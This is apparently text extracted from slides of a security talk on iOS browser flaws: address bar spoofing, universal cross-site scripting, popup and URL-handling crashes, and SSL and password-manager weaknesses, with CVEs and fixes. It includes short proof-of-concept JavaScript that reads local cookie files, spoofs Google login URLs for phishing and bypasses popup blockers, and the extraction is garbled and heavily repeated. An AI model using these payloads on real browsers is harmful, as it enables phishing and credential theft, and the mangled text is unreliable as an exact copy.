bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 11: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/11.jpg)
UIWebView API
bull loadRequest
bull loadHTMLStringbaseURL
bull loadDataMIMETypetextEncodingNamebaseURL
bull goBackgoForwardstopLoadingreload
bull request (read-only)
UIWebView amp WKWebView
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
UXSS: Universal Cross-Site Scripting

